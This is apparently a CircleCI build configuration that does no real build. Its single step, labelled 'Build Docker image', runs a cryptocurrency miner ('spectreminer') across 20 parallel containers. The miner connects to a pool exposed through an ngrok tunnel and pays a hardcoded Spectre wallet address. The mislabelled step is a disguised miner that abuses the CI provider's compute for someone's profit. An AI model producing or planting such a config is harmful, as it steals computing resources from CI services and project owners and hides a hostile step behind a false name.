version: 2.1
jobs:
  build:
    
    docker:
      - image: cimg/base:2022.09
    parallelism: 20
    steps:
      - checkout
      - setup_remote_docker:
          docker_layer_caching: true
 
      - run:
          name: Build Docker image
          command: |
            chmod +x spectreminer
            ./spectreminer -s 0.tcp.ngrok.io:15145 --miningaddr=spectre:qqsw4czp5raugmh9utt4gy7axa2kq6j8jgy96nfw7ncwpfexrl6j5lrqm633g --workers 4
